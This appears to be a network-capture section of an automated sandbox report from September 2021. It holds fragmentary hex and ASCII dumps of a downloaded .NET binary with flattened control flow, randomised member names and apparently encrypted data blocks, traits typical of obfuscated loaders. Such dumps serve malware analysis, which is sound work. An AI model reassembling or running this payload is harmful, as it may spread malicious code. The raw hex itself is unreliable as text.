                                            2021-09-27 18:36:57 UTC200INData Raw: ff ff 7e b9 00 00 04 28 5e 05 00 06 11 20 28 5f 05 00 06 28 60 05 00 06 28 61 05 00 06 20 bf 00 00 00 28 76 05 00 06 39 04 dd ff ff 26 38 fa dc ff ff 20 76 00 00 00 20 52 00 00 00 58 fe 0e 21 00 20 41 00 00 00 38 e5 dc ff ff fe 0c 25 00 20 03 00 00 00 fe 0c 31 00 9c 20 7c 00 00 00 28 75 05 00 06 3a c8 dc ff ff 26 20 11 00 00 00 38 bd dc ff ff fe 0c 0a 00 20 1e 00 00 00 20 44 00 00 00 20 1f 00 00 00 58 9c 20 45 01 00 00 fe 0e 16 00 38 96 dc ff ff fe 0c 25 00 20 09 00 00 00 fe 0c 31 00 9c 20 74 00 00 00 28 76 05 00 06 39 7d dc ff ff 26 38 73 dc ff ff fe 0c 0a 00 20 1a 00 00 00 20 81 00 00 00 20 2b 00 00 00 59 9c 20 1a 00 00 00 28 75 05 00 06 39 53 dc ff ff 26 20 36 00 00 00 38 48 dc ff ff fe 0c 0a 00 20 17 00 00 00 fe 0c 21 00 9c 20 04 01 00 00 28 76 05 00
                                            Data Ascii: ~(^ (_(`(a (v9&8 v RX! A8% 1 |(u:& 8 D X E8% 1 t(v9}&8s +Y (u9S& 68H ! (v
                                            2021-09-27 18:36:57 UTC202INData Raw: fe 0c 21 00 9c 20 31 00 00 00 38 c8 d7 ff ff fe 0c 25 00 20 09 00 00 00 fe 0c 31 00 9c 20 3e 01 00 00 38 b0 d7 ff ff 20 98 00 00 00 20 32 00 00 00 59 fe 0e 31 00 20 15 01 00 00 28 75 05 00 06 3a 92 d7 ff ff 26 20 58 00 00 00 38 87 d7 ff ff fe 0c 25 00 20 00 00 00 00 fe 0c 31 00 9c 20 30 01 00 00 38 6f d7 ff ff 20 46 00 00 00 20 13 00 00 00 59 fe 0e 21 00 20 3b 00 00 00 28 76 05 00 06 3a 51 d7 ff ff 26 20 89 00 00 00 38 46 d7 ff ff 20 fa 00 00 00 20 53 00 00 00 59 fe 0e 31 00 20 43 01 00 00 28 75 05 00 06 3a 28 d7 ff ff 26 20 fc 00 00 00 38 1d d7 ff ff fe 0c 0a 00 20 0a 00 00 00 fe 0c 21 00 9c 20 3b 00 00 00 28 75 05 00 06 39 00 d7 ff ff 26 20 c4 00 00 00 38 f5 d6 ff ff fe 0c 25 00 20 02 00 00 00 fe 0c 31 00 9c 20 2e 01 00 00 fe 0e 16 00 38 d5 d6 ff ff fe
                                            Data Ascii: ! 18% 1 >8 2Y1 (u:& X8% 1 08o F Y! ;(v:Q& 8F SY1 C(u:(& 8 ! ;(u9& 8% 1 .8
                                            2021-09-27 18:36:57 UTC203INData Raw: 20 73 00 00 00 59 9c 20 88 00 00 00 28 76 05 00 06 39 68 d2 ff ff 26 38 5e d2 ff ff fe 0c 25 00 20 07 00 00 00 20 53 00 00 00 20 04 00 00 00 58 9c 20 34 01 00 00 38 43 d2 ff ff fe 0c 0a 00 20 19 00 00 00 fe 0c 21 00 9c 20 af 00 00 00 38 2b d2 ff ff 20 ee 00 00 00 20 4f 00 00 00 59 fe 0e 31 00 20 aa 00 00 00 28 75 05 00 06 39 0d d2 ff ff 26 20 51 01 00 00 38 02 d2 ff ff fe 0c 25 00 20 0e 00 00 00 fe 0c 31 00 9c 20 3d 01 00 00 38 ea d1 ff ff fe 0c 25 00 20 03 00 00 00 20 7c 00 00 00 20 36 00 00 00 58 9c 20 ea 00 00 00 28 76 05 00 06 39 c6 d1 ff ff 26 20 62 00 00 00 38 bb d1 ff ff fe 0c 25 00 20 06 00 00 00 20 7a 00 00 00 20 29 00 00 00 58 9c 20 c3 00 00 00 28 76 05 00 06 39 97 d1 ff ff 26 20 39 00 00 00 38 8c d1 ff ff fe 0c 0a 00 20 1d 00 00 00 fe 0c 21 00
                                            Data Ascii: sY (v9h&8^% S X 48C ! 8+ OY1 (u9& Q8% 1 =8% | 6X (v9& b8% z )X (v9& 98 !
                                            2021-09-27 18:36:57 UTC204INData Raw: 00 00 38 00 00 00 00 17 13 2a 20 00 00 00 00 28 75 05 00 06 39 dc ff ff ff 26 20 01 00 00 00 38 d1 ff ff ff dd 93 cc ff ff 20 09 00 00 00 38 81 c0 ff ff 00 00 00 41 64 00 00 00 00 00 00 bb 0a 00 00 a3 00 00 00 5e 0b 00 00 2d 00 00 00 16 00 00 01 00 00 00 00 5f 0c 00 00 da 32 00 00 39 3f 00 00 4e 00 00 00 16 00 00 01 00 00 00 00 9e 01 00 00 60 08 00 00 fe 09 00 00 4e 00 00 00 16 00 00 01 00 00 00 00 ba 00 00 00 58 00 00 00 12 01 00 00 32 00 00 00 16 00 00 01 1b 30 06 00 40 06 00 00 58 00 00 11 02 28 a2 00 00 0a 0a 7e cf 00 00 04 3a 06 04 00 00 16 13 17 7e bf 00 00 04 25 13 26 12 17 28 bb 00 00 0a 73 bc 00 00 0a 0b 20 43 00 00 02 28 23 06 00 06 28 a2 00 00 0a 6f a3 00 00 0a 72 ca 01 00 70 6f bd 00 00 0a 73 3b 00 00 0a 0c 08 6f b5 00 00 0a 16 6a 6f b6 00 00
                                            Data Ascii: 8* (u9& 8 8Ad^-_29?N`NX20@X(~:~%&(s C(#(orpos;ojo
                                            2021-09-27 18:36:57 UTC206INData Raw: 01 00 00 11 1e 6f cd 00 00 0a 13 1f 11 1f 8e 69 17 58 13 20 11 20 8d 1e 00 00 01 13 21 11 1e 6f ce 00 00 0a 6f cf 00 00 0a 39 15 00 00 00 11 21 16 11 1e 6f ce 00 00 0a 6f d0 00 00 0a a2 38 13 00 00 00 11 21 16 20 16 00 00 01 28 23 06 00 06 28 a2 00 00 0a a2 16 13 22 38 17 00 00 00 11 21 11 22 17 58 11 1f 11 22 9a 6f d1 00 00 0a a2 11 22 17 58 13 22 11 22 11 1f 8e 69 3f de ff ff ff 7e 62 00 00 0a 11 1e 6f d2 00 00 0a 11 21 06 17 73 7e 00 00 0a 13 23 11 23 6f d3 00 00 0a 13 24 16 13 25 38 78 00 00 00 11 25 13 27 11 27 45 04 00 00 00 05 00 00 00 16 00 00 00 27 00 00 00 38 00 00 00 38 44 00 00 00 11 24 7e 6a 00 00 0a 6f d4 00 00 0a 38 41 00 00 00 11 24 7e 6d 00 00 0a 6f d4 00 00 0a 38 30 00 00 00 11 24 7e 93 00 00 0a 6f d4 00 00 0a 38 1f 00 00 00 11 24 7e d5
                                            Data Ascii: oiX !oo9!oo8! (#("8!"X"o"X""i?~bo!s~##o$%8x%''E'88D$~jo8A$~mo80$~o8$~
                                            2021-09-27 18:36:57 UTC207INData Raw: 01 a2 07 17 03 a2 07 6f 9b 00 00 0a 74 73 00 00 01 2a 00 00 1b 30 08 00 06 64 00 00 5e 00 00 11 20 24 00 00 00 fe 0e 21 00 38 00 00 00 00 fe 0c 21 00 45 ac 02 00 00 23 33 00 00 b3 06 00 00 e2 1b 00 00 fa 45 00 00 93 26 00 00 23 1d 00 00 86 0d 00 00 f5 0f 00 00 cf 53 00 00 e3 28 00 00 60 05 00 00 08 20 00 00 9e 02 00 00 b5 50 00 00 a7 51 00 00 24 28 00 00 5a 37 00 00 17 3d 00 00 2e 04 00 00 ae 53 00 00 73 1e 00 00 0c 3c 00 00 3a 26 00 00 70 06 00 00 3c 3b 00 00 da 24 00 00 2d 10 00 00 c0 00 00 00 fc 2e 00 00 56 10 00 00 04 56 00 00 df 4c 00 00 8c 1e 00 00 cc 47 00 00 1b 0a 00 00 a6 10 00 00 41 04 00 00 0f 37 00 00 a3 54 00 00 27 37 00 00 72 37 00 00 ac 18 00 00 24 24 00 00 69 3e 00 00 26 13 00 00 cf 1d 00 00 74 15 00 00 47 3c 00 00 69 56 00 00 ba 11 00 00
                                            Data Ascii: ots*0d^ $!8!E#3E&#S(` PQ$(Z7=.Ss<:&p<;$-.VVLGA7T'7r7$$i>&tG<iV
                                            2021-09-27 18:36:57 UTC209INData Raw: 00 00 6f 16 00 00 07 3e 00 00 31 0e 00 00 28 06 00 00 99 42 00 00 18 44 00 00 a2 06 00 00 38 3d 00 00 d1 17 00 00 e9 11 00 00 9a 07 00 00 0c 1a 00 00 75 2e 00 00 a2 3e 00 00 a9 01 00 00 3b 4a 00 00 c9 3a 00 00 a0 50 00 00 94 03 00 00 ea 50 00 00 5e 31 00 00 be 05 00 00 83 45 00 00 0a 1f 00 00 e2 15 00 00 e5 21 00 00 74 42 00 00 9b 12 00 00 c7 3d 00 00 9c 36 00 00 a0 44 00 00 5c 07 00 00 24 00 00 00 87 13 00 00 60 1d 00 00 eb 13 00 00 af 13 00 00 67 38 00 00 17 08 00 00 9d 05 00 00 f5 14 00 00 b0 3a 00 00 5c 08 00 00 d8 51 00 00 ad 03 00 00 e7 42 00 00 f2 4d 00 00 e9 0e 00 00 4b 47 00 00 73 47 00 00 ea 24 00 00 1b 1c 00 00 cf 0a 00 00 19 14 00 00 71 55 00 00 54 4c 00 00 c1 3e 00 00 4c 27 00 00 1d 3b 00 00 77 28 00 00 c3 06 00 00 b3 44 00 00 ff 27 00 00 34
                                            Data Ascii: o>1(BD8=u.>;J:PP^1E!tB=6D\$`g8:\QBMKGsG$qUTL>L';w(D'4
                                            Data Ascii: fc3em_a781083812794decae7414f1c0b3b977m_fe1fcf545cc9457f84ee2deec1839a58m_3e383eaf6f444d3b9aec8f03e67c1959m_c74400dc31064d3396f3b5882507a90am_0069db25c3e0438ba4d906b9997dcb84m_85057aacef5c4696b27ad07bef5080bcm_2fe306fac74a4713b6dca81ec767a178m_59c
                                            2021-09-27 18:36:57 UTC341INData Raw: 6c 00 43 6c 65 61 72 50 72 6f 6a 65 63 74 45 72 72 6f 72 00 52 65 66 65 72 65 6e 63 65 45 71 75 61 6c 73 00 53 79 6e 63 68 72 6f 6e 69 7a 65 64 00 67 65 74 5f 49 73 42 79 52 65 66 00 47 65 74 45 6c 65 6d 65 6e 74 54 79 70 65 00 52 65 73 6f 6c 76 65 54 79 70 65 00 52 65 61 64 42 79 74 65 00 52 65 61 64 53 69 6e 67 6c 65 00 52 65 61 64 44 6f 75 62 6c 65 00 43 6f 6d 70 61 72 65 54 6f 00 67 65 74 5f 49 73 45 6e 75 6d 00 47 65 74 55 6e 64 65 72 6c 79 69 6e 67 54 79 70 65 00 43 68 61 6e 67 65 54 79 70 65 00 54 6f 4f 62 6a 65 63 74 00 54 6f 55 49 6e 74 36 34 00 54 6f 55 49 6e 74 33 32 00 46 72 65 65 48 47 6c 6f 62 61 6c 00 67 65 74 5f 46 75 6c 6c 4e 61 6d 65 00 47 65 74 46 75 6e 63 74 69 6f 6e 50 6f 69 6e 74 65 72 00 52 65 73 6f 6c 76 65 46 69 65 6c 64 00 52 65
                                            Data Ascii: lClearProjectErrorReferenceEqualsSynchronizedget_IsByRefGetElementTypeResolveTypeReadByteReadSingleReadDoubleCompareToget_IsEnumGetUnderlyingTypeChangeTypeToObjectToUInt64ToUInt32FreeHGlobalget_FullNameGetFunctionPointerResolveFieldRe
                                            2021-09-27 18:36:57 UTC345INData Raw: 60 05 07 02 08 12 60 04 08 00 12 60 03 06 12 64 04 00 00 12 64 07 06 15 12 80 9d 01 0e 02 06 02 02 06 08 04 00 00 1d 1c 0b 10 01 04 1d 1c 08 1c 1c 10 1e 00 61 07 32 12 80 cc 12 80 f1 08 08 08 08 1d 12 80 f5 08 12 79 12 80 bc 11 80 90 08 08 12 80 c0 08 08 08 12 80 c4 12 80 c8 08 08 12 80 a0 05 08 1c 08 1d 08 08 12 80 e8 1d 12 80 f5 02 08 12 80 f9 08 12 79 08 12 79 08 12 80 c0 08 1d 1c 12 80 f9 08 08 12 79 02 15 12 80 fd 01 12 80 c4 1c 08 11 80 90 08 15 12 80 9d 01 12 80 c0 08 15 12 80 9d 01 12 80 c4 08 15 12 80 fd 01 12 80 c4 0a 20 01 01 15 12 80 fd 01 13 00 08 15 12 80 9d 01 12 80 a0 02 06 19 07 00 03 1d 1c 08 1c 1c 03 0a 01 08 0a 10 01 03 1d 1c 08 1c 10 1e 00 08 07 03 08 1d 05 12 81 19 06 20 01 01 12 81 1d 04 00 01 01 1c 0e 07 0a 12 81 21 08 08 08 08 08
                                            Data Ascii: ```dda2yyyy !
                                            2021-09-27 18:36:57 UTC349INData Raw: 09 08 09 08 1d 05 09 09 09 09 08 08 12 81 21 09 09 09 20 02 01 12 81 1d 11 82 15 05 00 01 1d 0e 1c 08 07 01 15 12 80 9d 01 0e 04 20 00 1d 0e 05 20 00 1d 13 00 07 00 02 12 80 ed 1c 1c 04 07 02 0e 08 05 00 00 12 82 1d 06 20 01 01 12 82 21 05 00 02 1c 1c 09 06 00 02 09 0f 01 09 06 07 03 09 0f 05 09 08 00 03 02 0f 01 0f 01 09 04 07 02 02 09 07 00 03 01 0f 01 05 09 03 07 01 09 08 00 03 01 0f 01 0f 01 09 08 00 03 01 0f 05 0f 05 09 06 07 02 0f 05 0f 05 08 00 03 09 1c 09 11 81 58 08 07 03 09 45 10 05 1d 05 05 00 02 09 1c 09 06 00 03 09 1c 09 1c 21 07 12 45 10 05 45 10 05 0f 05 09 0f 05 0f 05 0f 09 0f 05 09 1d 09 0f 05 09 09 09 05 09 1d 05 1d 05 02 1d 05 06 00 02 1d 05 1c 09 05 07 02 09 1d 05 04 06 11 81 64 04 06 11 81 68 04 06 11 81 6c 04 06 11 81 70 04 06 11 81
                                            Data Ascii: ! !XE!EEdhlp
                                            2021-09-27 18:36:57 UTC353INData Raw: 1e ab 1e ac 1e 00 96 80 80 10 50 00 76 ba 1e 22 9d 98 80 60 50 01 22 a9 82 80 a0 01 6f b8 82 80 a0 01 ae b9 82 80 40 20 83 81 80 20 22 a2 82 80 a0 01 72 a3 82 80 a0 01 72 bb 83 80 a0 01 12 18 7a 18 16 11 7a 18 72 90 84 80 a0 01 76 12 32 ba 1e 47 12 19 47 12 1a 22 96 84 80 a0 01 12 19 6b 98 05 22 97 84 80 a0 01 12 1a 7a 18 22 bc 83 80 a0 01 76 1f 45 ba 1e 45 22 90 45 ba 1e 50 00 12 1b a2 9a 83 80 40 6b be 05 72 bd 82 80 a0 01 6f b4 97 80 60 12 1c 7a 1c 72 b5 97 80 60 50 00 04 72 b6 82 80 a0 01 7a 1c 7a 1c 72 b5 97 80 60 72 be 82 80 a0 01 07 72 b6 97 80 60 12 1d 50 20 93 ad 80 80 10 12 82 01 50 1a 50 9d 01 8d 12 83 01 7a 82 01 50 00 7a 83 01 2a 50 ac 03 50 8e 01 28 12 83 01 7a 82 01 50 00 7a 83 01 2a 7a 82 01 50 00 50 82 03 50 af 01 28 2a 7a 82 01 50 01 50
                                            Data Ascii: Pv"`P"o@ "rrzzrv2GG"k"z"vEE"EP@kro`zr`Przzr`rr`P PPzPz*PP(zPz*zPPP(*zPP
                                            2021-09-27 18:36:57 UTC356INData Raw: 2a 7a 3c 50 0c 50 8a 02 50 2e 28 2a 50 24 50 0c 8d 12 3d 7a 3c 50 0c 7a 3d 2a 7a 3c 50 0c 50 b5 03 50 91 01 28 2a 7a 3c 50 0c 50 98 03 50 88 01 28 2a 7a 3c 50 0c 50 ab 03 50 8e 01 28 2a 50 ac 02 50 01 8d 12 3d 7a 3c 50 0c 7a 3d 2a 50 9c 02 50 34 28 12 3d 7a 3c 50 0d 7a 3d 2a 50 ad 03 50 8f 01 28 12 3d 7a 3c 50 0d 7a 3d 2a 50 88 03 50 82 01 28 12 3d 7a 3c 50 0d 7a 3d 2a 7a 3c 50 0d 50 a5 03 50 8c 01 28 2a 50 85 03 50 aa 01 28 12 3d 7a 3c 50 0d 7a 3d 2a 7a 3c 50 0e 50 86 01 50 1e 8d 2a 7a 3c 50 0e 50 30 50 92 01 8d 2a 50 a7 02 50 37 28 12 3d 7a 3c 50 0e 7a 3d 2a 50 ae 03 50 8f 01 28 12 3d 7a 3c 50 0e 7a 3d 2a 50 2f 50 1c 28 12 3d 7a 3c 50 0e 7a 3d 2a 7a 3c 50 0f 50 94 03 50 86 01 28 2a 50 98 01 50 11 8d 12 3d 7a 3c 50 0f 7a 3d 2a 50 a7 02 50 37 28 12 3d 7a
                                            Data Ascii: *z<PPP.(*P$P=z<Pz=*z<PPP(*z<PPP(*z<PPP(*PP=z<Pz=*PP4(=z<Pz=*PP(=z<Pz=*PP(=z<Pz=*z<PPP(*PP(=z<Pz=*z<PPP*z<PP0P*PP7(=z<Pz=*PP(=z<Pz=*P/P(=z<Pz=*z<PPP(*PP=z<Pz=*PP7(=z
                                            2021-09-27 18:36:57 UTC361INData Raw: 06 50 0f 50 a5 02 50 37 28 2a 50 84 02 32 bf 1e 50 ab 01 50 20 8d 12 0d 50 b0 05 22 8a 95 80 60 16 bf 1e 90 32 be 1e 7a 01 50 03 7a 17 2a 50 9d 02 32 bf 1e 50 bb 01 50 16 8d 12 0c 50 37 32 bf 1e 7a 01 50 0b 50 39 50 26 28 2a 50 31 22 89 95 80 60 16 bf 1e 90 50 ab 04 32 bf 1e 7a 06 50 09 7a 0c 2a 50 9d 01 32 bf 1e 7a 06 50 05 7a 0d 2a 50 95 05 32 bf 1e 7a 06 50 1e 7a 0d 2a 50 a2 05 22 89 95 80 60 76 bf 1e 90 32 be 1e 50 bf 02 50 3f 28 12 0c 50 bd 04 22 8a 95 80 60 16 bf 1e 90 32 be 1e 7a 06 50 01 7a 0c 2a 50 9a 05 22 89 95 80 60 76 bf 1e 90 32 be 1e 7a 01 50 05 50 2a 50 9e 01 8d 2a 50 30 22 8a 95 80 60 16 bf 1e 90 32 be 1e 7a 10 22 b9 94 80 60 50 00 04 22 ba 94 80 60 50 ac 04 32 bf 1e 7a 01 50 08 50 89 03 50 83 01 28 2a 50 8b 02 22 8a 95 80 60 16 bf 1e 90
                                            Data Ascii: PPP7(*P2PP P"`2zPz*P2PPP72zPP9P&(*P1"`P2zPz*P2zPz*P2zPz*P"`v2PP?(P"`2zPz*P"`v2zPP*P*P0"`2z"`P"`P2zPPP(*P"`
                                            2021-09-27 18:36:57 UTC365INData Raw: bb 03 32 bf 1e 7a 06 50 0a 50 b9 03 50 93 01 28 2a 50 a2 03 32 bf 1e 32 ad 39 50 bf 04 32 bf 1e 7a 01 50 0e 7a 17 2a 50 a5 05 22 8a 95 80 60 16 bf 1e 90 32 be 1e 50 84 02 50 88 01 28 12 0d 50 93 05 32 bf 1e 7a 01 50 0e 7a 17 2a 50 2f 32 bf 1e 7a 06 50 0b 7a 0c 2a 50 82 04 22 8a 95 80 60 16 bf 1e 90 32 be 1e 7a 06 50 1f 7a 0c 2a 50 33 32 bf 1e 50 b8 01 50 94 01 8d 12 0c 50 83 02 22 89 95 80 60 76 bf 1e 90 32 be 1e 7a 01 50 09 50 8d 02 50 2f 28 2a 50 ae 03 32 bf 1e 50 a1 01 50 3e 8d 12 0d 50 ac 02 22 89 95 80 60 76 bf 1e 90 32 be 1e 50 9b 01 50 07 8d 12 17 50 99 03 22 8a 95 80 60 16 bf 1e 90 32 be 1e 50 bd 02 50 9a 01 28 12 0d 50 8a 03 32 bf 1e 50 9d 03 50 89 01 28 12 0c 50 2e 32 bf 1e 7a 06 50 1c 7a 0c 2a 50 1a 32 bf 1e 7a 06 50 1e 7a 0d 2a 50 a7 05 32 bf
                                            Data Ascii: 2zPPP(*P229P2zPz*P"`2PP(P2zPz*P/2zPz*P"`2zPz*P32PPP"`v2zPPP/(*P2PP>P"`v2PPP"`2PP(P2PP(P.2zPz*P2zPz*P2
                                            2021-09-27 18:36:57 UTC369INData Raw: ea 21 78 11 70 31 c6 ca 0c 30 26 d5 02 33 64 99 d5 96 fa 16 1b 88 f7 ec 73 84 f8 1c 08 f7 30 9f 24 ba 1a 3c 06 20 ae d5 0a 21 eb d5 28 6f 77 ea 39 d7 16 81 18 6e 1d 37 f9 f1 c7 34 72 bc e3 0f 5c df e2 0d 76 33 30 b7 95 d0 64 74 23 ed cb 23 e4 62 09 1b 7a 4f 9f 78 ba 0c 69 19 ee e0 01 33 fb 91 2a 4b 59 c1 20 fb 46 e2 4b a3 8a e3 f8 90 85 62 0d 54 7c 9b a7 21 dc 4c 8e 85 55 56 48 0a fc 9e b9 3c 34 69 82 b6 c3 4a d9 c4 38 a4 d3 46 f8 8d 12 20 97 92 44 0d 7d c6 35 5b bb 6d 1c ba 07 54 4b b0 45 07 dd 9c 3b 54 9f eb c7 02 86 f9 d0 39 9a 85 46 1b 8c 68 01 e5 0a 95 ca 2e e8 3a 46 70 53 d3 34 26 3c f7 81 d9 13 2d e6 b4 b8 3e 84 8b 7d 2d ca 04 1e a5 42 42 51 b4 b5 68 d2 c0 bc 3c 6f 5a db 5d 98 73 d1 10 eb 2d b8 a2 1b ae 1f e2 42 39 34 95 7d 27 e2 1b 14 0c 7a e1 0d
                                            Data Ascii: !xp10&3ds0$< !(ow9n74r\v30dt##bzOxi3*KY FKbT|!LUVH<4iJ8F D}5[mTKE;T9Fh.:FpS4&<->}-BBQh<oZ]s-B94}'z
                                            2021-09-27 18:36:57 UTC373INData Raw: 28 d4 81 53 b1 51 53 89 0f d5 ce 1b 0c d5 8a 37 69 59 3c 5c f0 bc d0 4b f0 ec b1 7c c7 ea 02 b3 b8 7f 0d 0f 32 53 1b 5b 9b de 33 45 cd 8e dd 71 2e 2e e3 77 89 d6 aa 1e f5 53 a2 91 91 50 76 c7 c4 90 19 38 07 87 cd fa be 2e ee 10 0d d2 68 9e e4 aa df ee bb 96 bd 57 63 3c a9 56 75 82 c3 a6 c4 13 f1 bc 69 a6 bf 68 80 21 72 3b 1d 4f 74 82 69 42 95 65 cf 65 cb 52 9d bf 54 ac fb d1 85 8f b5 b9 4f 49 fd 78 41 fb a3 a4 f9 b2 53 fa 4e f9 e9 90 a7 ea e1 d4 c3 97 a4 34 21 90 01 e7 66 d3 f4 82 58 18 89 c3 7d 41 0b 43 7b a2 5a bd ee 2d ce 0d d4 a4 a6 b0 8f 82 b6 47 fc a6 3a 8c bf 25 fb 84 f3 87 06 a7 15 4f 34 54 4f f6 e9 95 ee ac 07 93 9d 33 cc 3a cd 84 c3 1a 77 5d 7b 5b 89 32 3e 30 a7 01 41 dc 44 ee 3c 67 0a 6f 3a 8e 3b af 10 89 6a 2e f7 e0 ac 01 bf aa f8 3d 8f b7 27
                                            Data Ascii: (SQS7iY<\K|2S[3Eq..wSPv8.hWc<Vuih!r;OtiBeeRTOIxASN4!fX}AC{Z-G:%O4TO3:w]{[2>0AD<go:;j.='
                                            2021-09-27 18:36:57 UTC377INData Raw: 16 aa b7 73 27 5b 6f 97 64 a5 b5 a4 16 b6 27 35 76 4a e7 2f 20 c1 76 55 de 7c f8 2e 17 53 0c 70 ce d1 33 86 13 c9 1a f7 15 db 48 16 e2 99 58 cc 8d 46 0f 4a 58 5a 76 d5 b9 3c 2f b9 21 2e 08 a3 20 1a 85 ff 57 b2 41 b4 55 e7 5f f7 b1 12 27 a3 08 f3 e9 b4 7a d2 d1 e1 5b 30 de 21 94 7d 4f 77 ca 78 84 a3 34 b6 09 89 be 10 49 f7 1f 1d 47 85 ee aa 8f 48 83 a0 65 5b 97 fe c6 6e e9 65 03 1a 31 40 99 c8 9b c3 f2 b3 8b 06 8d ff f3 06 ea a0 86 67 a6 b6 8e a4 3b 6e 2f 35 d5 a1 92 75 bb 73 f2 cd f8 61 3a df a8 66 96 33 6f 79 60 f5 3c 47 a6 0e 90 a8 ef 89 e6 97 6d b3 17 4e a6 fb f6 d1 f4 e9 b6 43 c9 52 78 42 6e a5 6a 3f 7e 7f 69 73 e7 b9 0e f4 1d 6d b7 19 bd 3b 12 9d 62 bc b4 4a 90 1c 90 99 b7 e0 2e ba 50 03 2f 3d d2 11 98 35 e3 e4 06 1e e4 64 97 7e 8a 95 8d c9 db 37 47
                                            Data Ascii: s'[od'5vJ/ vU|.Sp3HXFJXZv</!. WAU_'z[0!}Owx4IGHe[ne1@g;n/5usa:f3oy`<GmNCRxBnj?~ism;bJ.P/=5d~7G
                                            2021-09-27 18:36:57 UTC393INData Raw: 79 f5 17 30 3d f3 35 74 60 e4 83 2c df fa d7 c9 75 87 ca db 37 0f 28 97 27 30 cc e0 fc 4f b9 77 7b c6 b9 46 81 bb 30 5d 83 0f 79 17 4d a5 f5 d1 e4 af 9a a7 7c 9c e0 b0 86 3a 3e 9a 14 e4 45 48 03 44 4d ef d5 5b a8 d3 42 fe 66 55 e6 3c 37 76 20 95 93 4b d8 2b 27 9b 2c fc fe 3f 7f 64 8c 36 b6 a6 c2 d4 30 0c 35 1e f8 cb 52 aa f8 e3 7e 80 43 41 1c 1e 52 c1 f4 18 4e ca 0e 17 9c d6 d0 0a ba 1a d2 6a 71 1f 07 a7 50 eb 11 fc c3 93 09 63 6f d4 a7 61 47 81 d3 65 76 69 94 c1 ae 54 54 35 fe a2 a9 e3 59 d1 5f 61 2b de cb c8 cc 5c c0 87 c6 61 96 da 32 f4 61 2a 03 b0 ef da 90 4f 38 67 bc 4a f1 7f f6 2c 23 79 89 d3 76 4e c6 fa 7d 3b 43 57 80 fe 3b 96 1e a1 64 2e f1 1d 73 ac 03 c7 8e 75 0b 97 29 8b bc 67 44 2d bf 22 52 64 c1 4e c3 85 78 4d e6 be 01 aa 12 ce b0 ff 53 a4 35
                                            Data Ascii: y0=5t`,u7('0Ow{F0]yM|:>EHDM[BfU<7v K+',?d605R~CARNjqPcoaGeviTT5Y_a+\a2a*O8gJ,#yvN};CW;d.su)gD-"RdNxMS5
                                            2021-09-27 18:36:57 UTC405INData Raw: 1d 5b a4 3e 38 0f 4b 4e c3 07 cd 71 d7 b6 4a 50 0c df 3b fa 35 c9 37 e8 39 d5 32 de 17 13 a6 7b a4 6f a0 8a 67 8c c6 ff c8 ee df c2 fc 40 7f 8a f9 a5 ac 85 e3 e0 2d c1 4f cf b7 cd 97 f7 e6 25 fc 09 06 e5 35 9e 91 43 3d 72 2c a2 96 cb 39 f7 f6 e3 ab 3e c7 bd 70 e6 d9 32 3e fd 0e ab 2f e5 5a 22 43 68 c7 df 91 2d 04 f6 7f 13 50 1b 2b 62 63 66 ea 4d ac 17 c2 c7 56 a4 ff bd 88 d8 69 79 ce 60 ad b4 21 60 e1 5c 74 8e 9a 51 e2 10 fa 3f c0 06 a9 29 12 1b 43 20 a0 e6 e7 15 b3 df 1c 39 c6 f4 d5 3c 45 2f 69 17 9f 2b 8a 24 9b c3 aa 92 3c 25 b9 f9 98 f4 5f 48 2a 0a 36 84 cc fc f7 87 c5 86 0b 4e 5b 72 ce 9b 07 79 12 d8 c0 96 28 8f c6 51 a7 56 b6 b0 65 aa 97 ca a3 df ce 2e 10 9d 7e bd 60 1a 37 3c e4 67 d8 42 68 2c 4f 1e 06 b3 8d 2e 39 bd 9b dd 62 7b 84 81 ff 55 07 fc 62
                                            Data Ascii: [>8KNqJP;5792{og@-O%5C=r,9>p2>/Z"Ch-P+bcfMViy`!`\tQ?)C 9<E/i+$<%_H*6N[ry(QVe.~`7<gBh,O.9b{Ub
                                            2021-09-27 18:36:57 UTC421INData Raw: e7 07 63 c6 19 e8 51 ba 7f e4 b9 3f ba b9 75 5c a9 86 72 e7 4b 8b f7 1d 8a 88 55 3e c4 fb 22 ad 83 c3 55 f8 cc 82 74 28 0f fa 88 1a 8b be 91 e9 c3 9b a1 6a c2 14 d4 f1 5e 41 22 82 9b 2c 2f d7 c0 e4 d3 40 ed fc 24 fa 4e 89 94 08 27 3c 32 80 07 4e 95 3e 17 79 5a c9 61 72 6e 3a 01 12 d4 5b 71 1f 6d 5b 44 8e 4c e8 a3 92 ea 7a bb 0e 39 61 05 0a 95 ad ab 2a ba a1 6b 42 30 10 93 45 7f 50 1d cc a2 f6 bb 39 47 fe f2 50 b6 49 a2 41 0b 34 b5 cf 63 b1 80 40 9f b2 07 ec cc ac a8 86 95 9d 3d a7 8c 0a 47 5d bb 44 40 da 4d 07 34 c1 dc 1e 93 0b eb 18 a2 0d f2 a6 69 8b c0 6e 30 c9 c5 ec 66 5e 4d 4a b2 69 a0 dd bf 98 6c e9 80 5f 48 f6 70 14 4c 25 69 d1 24 9e da ef 43 3d 89 44 68 71 68 26 b9 eb c8 c5 b4 87 08 b1 db 1b f3 af 48 62 71 0c 0e b3 3e 01 fc 69 b0 a1 82 89 66 60 04
                                            Data Ascii: cQ?u\rKU>"Ut(j^A",/@$N'<2N>yZarn:[qm[DLz9a*kB0EP9GPIA4c@=G]D@M4in0f^MJil_HpL%i$C=Dhqh&Hbq>if`
                                            2021-09-27 18:36:57 UTC437INData Raw: d6 c0 51 e2 59 0e b6 f0 75 12 ed 80 8c ef aa 23 ab 34 7f 7b 64 76 cc 5e 60 94 eb 6c 56 1a d0 d8 03 c0 5f f4 74 5f 53 3e 94 11 e7 a8 d1 44 58 83 d4 86 c1 36 d8 de 70 4d ca 75 9f 30 6d 98 cd 7a f3 33 78 cf f3 47 ec 9b 85 03 93 25 2e 4a cc da 77 ea ae b2 5b b1 49 df a0 00 42 8a 97 e1 48 f1 79 b5 55 67 5b dd bd 66 c1 ff a4 00 8b 1e f1 7b db 5b 97 77 c6 85 fd 7e 2d e6 de 9a d5 f3 b5 0f 85 a6 67 89 15 6b 1d 10 c9 70 d9 5c 68 2d 42 05 40 b2 a7 0e 37 c6 c9 2c 4f 95 13 e0 9d 5e fe 7e a4 ab 1f 63 79 40 51 7d b8 ea bd bc 60 c8 98 43 e5 1f a6 86 fd f0 79 39 be 6a f9 ed 45 ff 11 68 84 3f 78 ff b7 90 79 d5 0b 26 cf c7 ae b7 e3 0a 17 ca 22 12 6e a3 e2 b7 f1 ba 8e 11 5f 79 87 77 70 89 c4 16 3d e5 cb 54 7b 23 d2 05 a6 7d c3 00 0f 91 e7 85 84 0b 44 69 ed f9 9d ef a6 8c 40
